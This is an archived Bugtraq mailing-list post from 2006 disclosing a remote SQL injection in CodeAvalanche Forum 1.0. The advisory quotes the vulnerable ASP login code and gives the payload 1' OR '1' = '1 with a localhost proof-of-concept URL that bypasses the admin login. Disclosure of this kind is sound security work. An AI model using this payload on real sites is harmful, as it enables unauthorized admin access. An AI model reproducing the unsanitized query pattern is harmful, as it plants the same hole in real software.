Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

CA Forum Remote SQL Injection

from [omnipresent] Network Security [Permanent Link]
Subject: CA Forum Remote SQL Injection
Date: 1 Jun 2006 17:09:10 -0000 
------------------------------------------------------------------
               - CAForum 1.0 Remote SQL Injection -
   -= http://colander.altervista.org/advisory/CAForum.txt =-
------------------------------------------------------------------

            -= CodeAvalanche Forum Version 1.0 =-



Omnipresent
june 01, 2006


Vunerability(s):
----------------
SQL Injection



Product:
--------
CodeAvalanche Forum Version 1.0

Vendor:
--------
http://www.truecontent.info/codeavalanche/asp-forum-script.php


Description of product:
-----------------------

CodeAvalanche FreeForum is asp forum application which allows free posting, 
there is no needs for registration of your
visitors. Administrator can add unlimited number of forum categories.


Vulnerability / Exploit:
------------------------

In the file default.asp in Admin directory is vulnerable to an Remote SQL 
Injection Attack.
A malicious people can gain Admin rights by putting rights parameters in the 
Password Variable.

Let's Check the source code:

<% Response.Buffer = True 


userLogged=false
If Request("Password")<>"" Then 
'response.Write(Request("Password")) 
'response.flush

dim rsUser,selectSQL
selectSQL="SELECT * FROM PARAMS where PASSWORD='" & Request("Password") & "'"


[...]



[End default.asp]

As you can see the variable Password is not properly sanitized before be used, 
so an attacker can put this string in the
password field:


1' OR '1' = '1

So, the query will be:

selectSQL="SELECT * FROM PARAMS where PASSWORD='1' OR '1' = '1'


And you can gain access to the application with admin rights.


PoC / Proof of Concept of SQL Injection:
----------------------------------------

This is a simple Proof Of Concept used on my local machine:


http://127.0.0.1/[Application_Path]/[CAForum]/admin/default.asp?password=1'%20OR%20'1'%20=%20'1


Vendor Status
-------------

Not informed!

Credits:
--------
omnipresent
omnipresent@email.it
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • CA Forum Remote SQL Injection, omnipresent <=
Previous by Date:  [ MDKSA-2006:094 ] - Updated evolution packages fix DoS (crash) vulnerability on certain messages., security
Next by Date:  Forensic memory dumping intricacies - PhysicalMemory, DD, and caching issues, Arne Vidstrom
Previous by Thread:  [ MDKSA-2006:094 ] - Updated evolution packages fix DoS (crash) vulnerability on certain messages., security
Next by Thread:  Forensic memory dumping intricacies - PhysicalMemory, DD, and caching issues, Arne Vidstrom
Indexes:  [Date] [Thread] [Top] [All Lists]